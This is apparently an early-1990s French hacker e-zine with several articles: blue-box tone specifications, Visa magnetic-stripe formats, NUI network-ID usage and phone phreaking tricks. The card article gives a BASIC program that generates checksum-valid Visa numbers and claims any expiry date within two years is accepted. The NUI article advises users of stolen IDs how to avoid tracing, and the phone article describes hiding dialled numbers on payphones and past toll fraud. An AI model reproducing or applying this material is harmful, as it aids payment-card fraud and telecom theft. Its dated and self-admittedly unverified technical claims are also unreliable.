Mais la rägle d'or pour comprendre est:
Un seul changement à la fois et observez TRES BIEN les effets!
> Bi-Bop:
------
Il y a eu un gros tapage mediatique sur le Bi-Bop et rien au niveau
technique. Arghhh... Horreur, reveillons nous! Il est temps d'ouvrir notre
champ de conscience aux champs hertziens ;)
Caracteristiques techniques du Bi-Bop SAGEM:
-------------------------------------------
Compatible CAI
Norme ETSI 300131
Conversion analogique/numerique: CODEC/ADPCM
Vitesse d'emission: 72 Kbit/s
Frequence: 864.1 à 868.1 MHz
Espacement entre canaux: 100 KHz
Nombre de canaux: 40
Sensibilité recepteur: 45 dB ÊV/m pour 0.001 BER (??????)
Parasites et rejection d'image: MPT1375 (CAI)
Intermodulation: 40 dB
Niveau de sortie HF: 10mW ERP maximum
Tolerance de frequence: +/- 10kHz
Les Bi-Bop de la SAGEM sont livres avec plusieurs numeros:
---------------------------------------------------------
S/N: (Serial Number?) : 10 caractäres alphanumériques
ELEC S/N: 12 chiffres
Code de securite principal: 6 chiffres
GPID: 16 caractäres alphanumériques
Si ca peut aider quelqu'un c'est cool... Si ca peut donner une piste aux
joyeux electroniciens qui lisent N0 Way, ca serait cool de recevoir un
article plus complet sur le Bi-Bop. (et sa norme, le CT2 parait il!)
> Blue boxe:
---------
Information fournie par Arscene.
Specification de SOCOTEL:
Hz 900 1100 1300 1500 1700
700 1 2 4 7 11
900 3 5 8 12
1100 6 9 kp1
1300 0 kp2
1500 st
Hangup: 3850 Hz
Timings: digit 0-9. Length: 60ms +/- 7ms
Delay : 60ms +/- 7ms
11 12 Length: 100ms +/- 15ms
Delay : 60ms +/- 7ms
kp1/2 & ST Length: 100ms +/- 15ms
Delay : 60ms +/- 7ms
Pulse Lenght: 35 +/- 5
Delay : 35 +/- 5
Théoriquement utilisée en France et en Espagne.
Le Hangup est "outband".
|\/| |/\|
STAY HARD
|/\| |\/|
NeurAlien
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.12
***********************************
* CARTE BANCAIRE VISA *
* Par *
* D. O'CONNELL *
* Pour *
* NO-WAY *
***********************************
Ce texte vous es proposé à titre purement informatif, je dégage toutes
responsabilitées quand à l'utilisation que vous pouvez en faire.
I Généralitées:
Une carte bancaire est un moyen de paiement électronique, pour ce faire on
dispose de trois solutions, la puce de la carte, les pistes magnétiques ou
simplement le numéro de carte en cas de télépaiement (pour les ignares áa
veux dire paiement à distance).
Le plus sur des moyens étant l'interrogation de la puce, c'est ce qui est
utilisé pour les paiements en magasin quand vous tapez votre code.
Les pistes magnétiques sont interrogées lors d' un retrait dans un DAB
(Distributeur Automatique de Billets) sans vérification de la puce.
Le numero de carte est utilisé par les anciens "terminaux" dit fer à repasser
oó l'embossage de la carte était tranféré par carbonne et pour les prises de
commande par téléphone.
II Les pistes magnétiques
Les cartes VISA comportent plusieurs pistes le standard ISO en definie 3, les
cartes franáaises en utilisent 4 ISO1, ISO2, et 2 autres propre à la France
T2, et T3 bravo la normalisation... Cependant pour des raisons de compatilitée
et de coñt une seule et utilisée à la fois généralement ISO2 mais parfois ISO1
dans les anciens terminaux.
Les informations sont codées en bi-phase le mieux étant de voir le dessin pour
comprendre:
Signal ⁄ƒƒƒø ⁄ƒƒƒø ⁄ƒø ⁄ƒø ⁄ ⁄ƒƒƒø ⁄ƒø ⁄ƒø ⁄ƒƒƒø
Ÿ ¿ƒƒƒŸ ¿ Ÿ ¿ƒŸ ¿ƒŸ Ÿ ¿ƒŸ ¿ƒƒƒŸ ¿ƒŸ ¿
Valeur 0 0 0 1 1 0 1 0 1 0
Simple non ?? Le bit est codé suivant deux fréquence la fréquence pour le 1
étant deux fois celle du 0.
Un prochain article intégrera je l'espäre le schéma d'un lecteur/écriveur de
piste magnétique, sachez qu'une tàte magnétique de magnétophone fait trés bien
l'affaire pour la lecture.
Bon maintenant il faut encore savoir comment interpréter les bits lus, il y a
deux standard pour cela:
-ANSI/ISO BCD FORMAT
BCD signifie Binary Coded Decimal ou Decimal Codé Binaire, le code est sur 5
bits 4 d'information et un de parité. La parité est impaire cela signifie que
chaque mot de 5 bits doit comporter un nombre IMPAIRE de 1.
La lecture commence, contre toute logique, par le bit le moins significatif!!
----DONNEES---- Parité
b1 b2 b3 b4 b5 Caractäre Fonction
0 0 0 0 1 0 Donnée
1 0 0 0 0 1 "
0 1 0 0 0 2 "
1 1 0 0 1 3 "
0 0 1 0 0 4 "
1 0 1 0 1 5 "
0 1 1 0 1 6 "
1 1 1 0 0 7 "
0 0 0 1 0 8 "
1 0 0 1 1 9 "
0 1 0 1 1 : Control
1 1 0 1 0 ; Start
0 0 1 1 1 < Control
1 0 1 1 0 = Séparateur
0 1 1 1 0 > Control
1 1 1 1 1 ? Fin
Voici donc un code purement numérique, pas évident pour écrire un nom! Mais
voici ZORO avec son ANSI/ISO ALPHA FORMAT:
--------Données------- Parité
b1 b2 b3 b4 b5 b6 b7 Caractäre Fonction
0 0 0 0 0 0 1 espace (0H) Spécial
1 0 0 0 0 0 0 ! (1H) "
0 1 0 0 0 0 0 " (2H) "
1 1 0 0 0 0 1 # (3H) "
0 0 1 0 0 0 0 $ (4H) "
1 0 1 0 0 0 1 % (5H) Start
0 1 1 0 0 0 1 & (6H) Spécial
1 1 1 0 0 0 0 ' (7H) "
0 0 0 1 0 0 0 ( (8H) "
1 0 0 1 0 0 1 ) (9H) "
0 1 0 1 0 0 1 * (AH) "
1 1 0 1 0 0 0 + (BH) "
0 0 1 1 0 0 1 , (CH) "
1 0 1 1 0 0 0 - (DH) "
0 1 1 1 0 0 0 . (EH) "
1 1 1 1 0 0 1 / (FH) "
0 0 0 0 1 0 0 0 (10H) Données
1 0 0 0 1 0 1 1 (11H) "
0 1 0 0 1 0 1 2 (12H) "
1 1 0 0 1 0 0 3 (13H) "
0 0 1 0 1 0 1 4 (14H) "
1 0 1 0 1 0 0 5 (15H) "
0 1 1 0 1 0 0 6 (16H) "
1 1 1 0 1 0 1 7 (17H) "
0 0 0 1 1 0 1 8 (18H) "
1 0 0 1 1 0 0 9 (19H) "
0 1 0 1 1 0 0 : (1AH) Spécial
1 1 0 1 1 0 1 ; (1BH) "
0 0 1 1 1 0 0 < (1CH) "
1 0 1 1 1 0 1 = (1DH) "
0 1 1 1 1 0 1 > (1EH) "
1 1 1 1 1 0 0 ? (1FH) FIN
0 0 0 0 0 1 0 @ (20H) Spécial
1 0 0 0 0 1 1 A (21H) Données
0 1 0 0 0 1 1 B (22H) "
1 1 0 0 0 1 0 C (23H) "
0 0 1 0 0 1 1 D (24H) "
1 0 1 0 0 1 0 E (25H) "
0 1 1 0 0 1 0 F (26H) "
1 1 1 0 0 1 1 G (27H) "
0 0 0 1 0 1 1 H (28H) "
1 0 0 1 0 1 0 I (29H) "
0 1 0 1 0 1 0 J (2AH) "
1 1 0 1 0 1 1 K (2BH) "
0 0 1 1 0 1 0 L (2CH) "
1 0 1 1 0 1 1 M (2DH) "
0 1 1 1 0 1 1 N (2EH) "
1 1 1 1 0 1 0 O (2FH) "
0 0 0 0 1 1 1 P (30H) "
1 0 0 0 1 1 0 Q (31H) "
0 1 0 0 1 1 0 R (32H) "
1 1 0 0 1 1 1 S (33H) "
0 0 1 0 1 1 0 T (34H) "
1 0 1 0 1 1 1 U (35H) "
0 1 1 0 1 1 1 V (36H) "
1 1 1 0 1 1 0 W (37H) "
0 0 0 1 1 1 0 X (38H) "
1 0 0 1 1 1 1 Y (39H) "
0 1 0 1 1 1 1 Z (3AH) "
1 1 0 1 1 1 0 [ (3BH) Spécial
0 0 1 1 1 1 1 \ (3DH) Spécial
1 0 1 1 1 1 0 ] (3EH) Spécial
0 1 1 1 1 1 0 ^ (3FH) Separateur
1 1 1 1 1 1 1 _ (40H) Spécial
Ouf voila la parité est toujours impaire, et on continue à lire le LSB en
premier.
On va maintenant s'interesser au données contenues dans dans les pistes ISO1,
et ISO2:
Les pistes T2 et T3 des cartes franáaise 'seraient' un redit des informations
des pistes ISO2 et ISO3, cette information est non vérifiée si vous avez des
renseignements....
Numero de la carte -> 1111 2222 3333 4444
Date d'expiration -> 12/99
Piste 2 (BCD,75 bpi)-> ;1111222233334444=9912101xxxxxxxxxxxxx?
Piste 1 (ALPHA,210 bpi)-> %B1111222233334444^PUBLIC/JOHN^9912101xxxxxxxxxxxxx?
PISTE 1
Champ # Longueur Fonction
------- -------- --------
1 1 Start Sentinel (STX)
2 1 Format Code
3 13/16 Numero de la carte
4 1 Separateur (^) HEX 5E
5 2-26 Nom du porteur
6 1 Separateur (^) HEX 5E
7 4 Date d'expiration MMAA
8 3 CODE ??? 101 ou 000 pas d'info
9 0/5 Verification du code secret
10 Depend de 3, 5, 9
11 11 Réservé
12 1 FIN (ETX)
13 1 LRC
Longueur maximum 79 Caractäres
Champ # Longueur Fonction
------- -------- -------------
1 1 Start Sentinel (STX)
2 13/16 Numero de carte
3 1 Separateurr (=) HEX 3D
4 4 Date d'expiration MMAA
5 3 Code ??? 101 ou 000 pas d'info
6 0/5 Vérification du code secret
7 Depend de 2, 6
8 1 Fin (ETX)
9 1 LRC
LRC est une sorte de checksum qui est calculé en faisant un XOR sur tout les
caractäres précédents sauf STX.
III Le numéro de carte
Le numéro inscrit sur votre carte est son identitée, c'est avec áa que toutes
les opérations sont traitées.
Pour une carte visa le numéro a 16 chiffres, les 4 premiers identifient l'
émetteur de la carte (la banque) les deux suivants ?? les 7 suivants sont le
numéro de compte du titulaire, les deux suivants ?? le dernier est attribué de
faáon mathématique ce qui permettra de vérifier si le numéro de carte est
valide ou non. On peut résumer la situation ainsi:
BBBB??NNNNNNNXXC
B=Code de la banque
N=Numéro de compte
C=Checksum
?=Aucune idée souvent 59 ou 60
X=Nombre de carte que vous avez eu (à verifier) souvent 01
Les Banques en fonction des 4 premiers chiffres:
-4970 La Poste
-4975 La Bred
-4972 Le Crédit Lyonnais
-4976 Banque Sofinco
-5131 Crédit Agricole
Je n'en connais pas d'autre mais il suffit de regarder sur la votre pour
trouver (!!?)
Une faáon trés simple d'avoir un numéro de compte est de regarder votre relevé
de compte chaque fois que l'on vous fait un chéque le numéro de compte sur
lequel il a été tiré est inscrit...
Voila le programme (en Basic GW) permettant de calculer le numéro d'une visa,
pour àtre sur d'un numéro de carte vous pouvez vous connecter sur Compuserve,
ou appeller un numéro de discution porno... (Enjoy your WANKING), ou utiliser
un soft shareware appelé Crédit Card Checking (CCC) distribué par l'ASP.
------------------------------------------------------------------------------
DEFINT A-Z
DIM buf(15)
CLS
INPUT "Numéro de la banque (4 chiffres):", bank$
INPUT "Numero de compte (7 chiffres) :", compt$
INPUT "Les 2 chiffres aprés la banque :", chif2$
INPUT "Les 2 chiffres avant le checksum:", chich$
FOR j = 1 TO 3
a$ = MID$(bank$, j, 1)
buf(j - 1) = VAL(a$)
NEXT j
FOR j = 1 TO 2
buf(j + 3) = VAL(MID$(chif2$, j, 1))
NEXT j
FOR j = 1 TO 7
buf(j + 5) = VAL(MID$(compt$, j, 1))
NEXT j
FOR j = 1 TO 2
buf(j + 12) = VAL(MID$(chich$, j, 1))
NEXT j
FOR i = 1 TO 9
modulo = 0
buf(15) = i
FOR k = 0 TO 15
IF ((k MOD 2) = (16 MOD 2)) THEN
j = 2 * buf(k)
ELSE j = buf(k)
END IF
IF j >= 10 THEN
x = (j MOD 10) + 1
ELSE x = j
END IF
modulo = modulo + x
NEXT
LOCATE 10, 10
IF modulo = 0 THEN
y = 3
END IF
IF (modulo MOD 10 = 0) AND (y <> 3) THEN
FOR z = 0 TO 15
PRINT buf(z);
NEXT
PRINT ""
PRINT "Modulo=", modulo
INPUT z
END IF
NEXT i
------------------------------------------------------------------------------
C'est du brut, libre à vous de rajouter des fioritures mais áa marche c'est le
principal non??
Voila la date d'expiration est simplement un flag à l'arrivée, donc vous
pouvez donner n'importe quoi dans la limite de deux ans aprés la date actuelle
exemple si on est le 02/94 une date valide est située entre le 03/94 et le
02/96.
IV La Puce
Bon pas beaucoup d'infos la dessus, c'est un vrai microcontrolleur, avec un
processeur 8 bits, de la RAM et de l' EPROM. La désignation officielle est CP8
c'est fabriqué par Bull je ne sais pas si il y a des secondes sources (peut
àtre Schlumberger mais pas Gemplus).
La carte est sécurisé par zone, la premiäre zone en accés libre comporte les
informations embossées (Nom, Prenom, Numero, Date d'expiration), la seconde
zone peut àtre lu apräs présentation d'un code c'est la zone de transaction,
un compteur comptabilise (comme tout bon compteur) les erreurs de présentation
de code aprés 3 erreurs successives màme sur des terminaux diffärents la
puce est irrémédiablement bloquée. La troisiéme zone est innaccessible depuis
l'exterrieur et comporte les codes de validation des programmes de cryptage
qui sont au nombre de 2 RSA et DES pour plus d'information à ce sujet on peut
se reporter à l'exellent livre "Cryptography and data security" aux éditions
Addison-Wesley. Mais sachez que pour cracker un code DES il vous fraudra
quelques siécles avec un DX2-66 et quelques millions de fois plus pour le RSA.
Je n' ai jammais entendu parler de fraude sur la puce des CB, peut etre que
quelqu'un me contredirra dans un futur (plus ou moins) proche.
Voila j'espäre que ce petit fichier vous aura interessé, dans un prochain nous
nous interesserons au carte F256 qui sont les puces des cartes de téléphones.
Les informations ci-dessus viennent de Phrack, Science et Vie, d' articles
dans divers jounaux dont j'ai oublié les noms, et du peu de choses
interessantes que l' éducation nationnale m'a apporté.
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.13
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
diffuse publiquement.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= CORE-DUMP | Volume I | Issue 2 | Phile 3 | [NeurAlien] 01/06/92 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
o|-=-||-=-||-=-||-=-||-=-||-=-||-=-||-=-|o
o|-=-| |-=-|o
o|-=-| N U I |-=-|o
o|-=-| |-=-|o
o|-=-| By |-=-|o
o|-=-| |-=-|o
o|-=-| NeurAlien |-=-|o
o|-=-| |-=-|o
o|-=-||-=-||-=-||-=-||-=-||-=-||-=-||-=-|o
NUI? Wot dis crap? ;)
---------------------
Vous connaissez tous ce qu'est un NUI bien sur!?!
Non? Eh bien c'est simple...
Sur tous reseau x25, il existe des acces PAD (Packet Assembler Disassembler)
qui permettent l'acces de terminaux series (V22,V22bis,V32...) au reseau
x25 qui lui fonctionne par paquets de donnees.
Pour cela, on paye le prix de la communication au PAD (0,13 FF pour le 3600 ou
3601 par exemple ou meme le 3613 en tarif rouge.) si c'est une communication
local au reseau. C'est alors la machine a laquelle on se connecte qui supporte
les charges du reseau x25.
Mais si la machine n'accepte pas de supporter ces couts ou si cette machine
se situe en dehors du reseau x25 sur lequel vous vous etes connecte, il vous
faudra un NUI.
Un NUI (Network User Id) permet la tarification des communications sur le
compte du possesseur de ce NUI.
C'est soit un nom suit d'un mot de passe, soit un code soit un numero.
Transpac:
--------
En accedant par le 3600, 3601, 36062424 ou 36069696 on accede a un PAD
qui requiert pour certainnes connections (vers l'étranger en particulier)
l'utilisation d'un NUI Intelmatique.
Ce NUI avait jusqu'en Juin 1991 le format suivant: XXXX ou XXXXXX
Ou X pouvait etre: A, B, C [...] Z ou 1, 2, 3, 4, 5, 6, 7, 8, 9, 0.
Concernant les bruits selons lesquels un NUI serait de la forme: XXXN ou
XXX serait alphabetique et N numerique, cela est TOTALEMENT faux.
Maintenant, ils ont tous le format: XXXXXX.
Il sont fait aleatoirement par Intelmatique et inmodifiables par
l'utilisateur.
Pour les utiliser:
on tape son NUA puis D ou P puis le NUI:
026245911010290DXXXXXX
026245911010290P
La seule particularite est qu'avec P, le NUI n'apparait pas a la saisie.
(le systeme repondant a 026245911010290 est MSN, MAILBOX SYSTEM of NURNBERG
et est PUBLIC)
Teletel:
-------
Les NUI utilises sur Teletel sont eux aussi des NUI Intelmatique
sont indiferencies de ceux utilises sur TRANSPAC: on peut utiliser tous les
NUI Intelmatiques sur les PADs TRANSPAC ou les PAVIs Teletel.
Pour le utiliser:
On tape son NUA, la touche >SUITE<, son NUI, la touche >ENVOI<.
026245911010290
>SUITE<
XXXXXX
>ENVOI<
Tymnet:
------
On utilise un NUI Tymnet de differentes facons.
Tout d'abord, l'acces ne se fait pas uniquement en France. Il y a des NUIs
Tymnet qui marchent partouts, d'autres qui sont localises a un pays bien
specifique.
On peut utiliser en France les NUIs de deux manieres differentes:
o En appelant un des quelques numeros de telephones donnant acces sur un
PAD
o En appelant via TRANSPAC un numero x25 en France qui est le serveur
de Tymnet et ensuite en donnnant son NUI.
Format du NUI Tymnet:
Un NUI Tymnet est compose d'une ou de deux parties differentes.
Le nom est tout le temps compose d'au moins un nom alphanumerique facilement
reconnaissable. C'est souvent le nom de la personne a qui appartient le NUI
ou le nom de la boite a qui appartient le NUI.
ex: coke01, time01, time02, VIDEO.
Et generalement, un mot de passe vient s'ajouter a ce nom pour theoriquement
le proteger de toute intrusion.
Pour avoir des informations sur Tymnet, tapez a la place du nom et du mot de
passe du NUI:
information<cr>
information<cr>
ou
help<cr>
help<cr>
ou
info<cr>
info<cr>
Gestion des NUI Intelmatiques:
-----------------------------
A chaque NUI Intelmatique correspond un NUA d'appel qui est transmis
au serveur sur lequel l'utilisateur se connecte grace a ce NUI.
Ce NUA d'appel commence toujours par 09330 et est suivi d'un numero qui
identifie ce NUI et seulement ce NUI.
Donc dans une table de Intelmatique, il est indique que le NUI XXXXXX
a pour NUA appelant: 09330123456789.
Ainsi, en cas d'abus d'un NUI, Intelmatique peut, grace aux fichiers de trace
et de logs des machines sur lesquels les utilisateurs de NUI se sont
connectes, voir quel utilisateur utilisait quel NUI.
Protection des NUIs et reperage des NUIs voles:
----------------------------------------------
D'une part, il est difficile de scanner un NUI du fait de sa nouvelle
forme qui permet une quantite enorme de possibilites.
D'autre part, TRANSPAC et Intelmatique *DOIVENT* (et c'est presque
certain) avoir mis en place une securite du type TAMS comme pour
TELENET/SPRINT aux USA.
Cet organe de securite est charge d'espionner toutes les connections en
permettant:
- le trace'age simple d'un NUI: enregistre le PAVI/PAD d'appel, le NUI
utilise et le numero appele pendant combien de temps
- le trace'age total: enregistrement complet de toute la communication.
- le trace'age des serveurs sensibles:
Certains serveurs comme les ALTOS ou LUTZIFER en allemagne sont connu pour
etre des reperes de Hackers et donc ceux ci utilisent souvent des NUIs
voles.
Donc Intelmatique et TRANSPAC scannent toutes les connections vers ces
services pour detecter si un NUI a ete vole.
C'est pour cela qu'il est fortement conseille d'appeler ces services via
des PADs prives ou des systemes d'exploitation prives.
>>>Et beaucoup d'autres securites insoupconnables je pense...
Conclusion:
----------
J'espere que ces infos vous auront ete d'une quelconque aide...
Toute information sur de nouveaux types de NUI m'interesse.
-%!% N0 Way %!%-
Volume I, Numéro 2, Partie 2.14
?allo?AlLo?Welcome to...HeLlO?
ZzzZZz OoOoOops
Hi! Comment s'amuser ~Plik~
<clik!> ou ennuyer quelqu'un o/~. o/~
-Bieeep- Avec un simple Allo?
%chunk% Telephone Hello?
`tchak' *KERCHUNK*
This is... AT&T Online... <CLAK>
Ah le telephone, souvent on passe à coté et on se dit:
"Non, je vais assurer, je vais pas passer ma soirée à déconner avec"
Mais finalement on ne resiste pas et hop, c'est parti, plongé dans la
découverte de ce monde qu'est le résau téléphonique.
Du peu que j'ai découvert par moi-màme et des grandes choses que
j'ai appris par d'autres, je fais aujourd'hui un article.
Je vais d'abord parler de comment obtenir des informations avec un téléphone.
=============================================================================
On a souvent besoin de savoir le nom de la personne à qui appartient
un certain numéro. Pour savoir cela, vous pouvez téléphoner à France Telecom
au service des renseignements et normalement vous serez taxés de 15 Fr environ
pour avoir cette information. De plus si le numéro indiqué est en liste rouge,
non seulement vous payerez 15 Fr mais vous n'aurez pas le nom de cette
personne. MERCI FARCE TELECOM !
Si vous presumez que le numéro appartient a une société, vous pouvez
refuser d'àtre taxe de 15F et juste demander a quelle société appartient ce
numéro, normalement, les opérateurs le disent en direct, sans rappeler et ainsi
vous ne payez presque rien (et carrement rien dans une cabine telephonique).
RENSEIGNEMENTs:
voir pour le rappel dans une cabine telephonique !
Renseignements internationaux:
meme chose que precedemment.
Cacher le numero appele dans une cabine a LCD:
=============================================
C'est tres simple comme principe. Un principe vieux comme le monde
d'ailleur, c'est celui de la white-box. Les phone phreaks on cherché le son
qui "masque" le mieux les autres sons et ils l'ont trouve; c'est le WHITE TONE
aussi connu en France sous le nom de bruit blanc.
Il est tres facile a faire avec sa propre bouche en faisant le "CHH" de "CHUT"
tres fort.
Comme vous le savez, dans les cabines telephoniques a LCD, le numero que vous
composez est affiche sur l'ecran et donc visible par beaucoup de monde.
Ca, ca vous botte pas trop. Surtout quand c'est un numero vert d'une PBX ou
VMB par exemple.
Alors ce que vous pouvez faire c'est composer un numero vert bidon (totalement
bidon: 05999999 par exemple, enfin, n'importe quoi puis #).
Il va y avoir une pause et le telephone va commencer a composer le numero en
DTMF. A partir de ce moment la, il va falloir envoyer un bruit blanc pour
"couvrir" le numero de telephone et le #.
Le # a pour but de terminer l'affichage des numeros tapes.
Vous remarquerez que votre bruit blanc ne passe pas sur les deux premiers
numeros: 0 et 5.
Ca c'est normal, c'est pour eviter d'enculer FT en faisant croire a la cabine
que vous appelez un numero vert et en fait appeler un 3670. :)
(Avant ca marchait impec!) hehehe
Une fois que la composition et le bruit blanc sont termines, vous pouvez
composer sans crainte d'etre vu les 6 derniers chiffres de votre numero vert.
Les services speciaux du telephone:
==================================
Vous savez que le telephone a des services speciaux accessibles par le
prefixe 36. Je vous conseille de scanner votre prefixe 36 dans votre coin car
on tombe souvent sur des trucs marrant voir interressants.
(Si vous avez un listing de ce scan, je suis pret a le publier dans No Way car
c'est vraiment interressant ce que l'on peut faire avec.)
Un exemple, certains numeros du 36 sont destines aux techniciens de FT pour
annoncer des modifications sur les lignes etc...
Exemple: vous pouvez annoncer la fin de contrat de votre M12 Philips de
compettition, resultat: un super nitel a vous à vie.
S'amuser "cheap" en soirée:
==========================
Décrochez le téléphone d'oó vous àtes et composez le 3644, raccrochez,
décrochez, raccrochez. Dans la seconde qui suit, le téléphone va sonner.
S'amuser "expensive" en soirée:
==============================
Pendant que tout le monde est couché en train de comater ou
completement scotché à l'Acid-core qui passe, téléphonez à Mike qui s'ennuie
à Hawaii ou a Atlanta. :)
This is the end, my friend............ ++NeurAlien
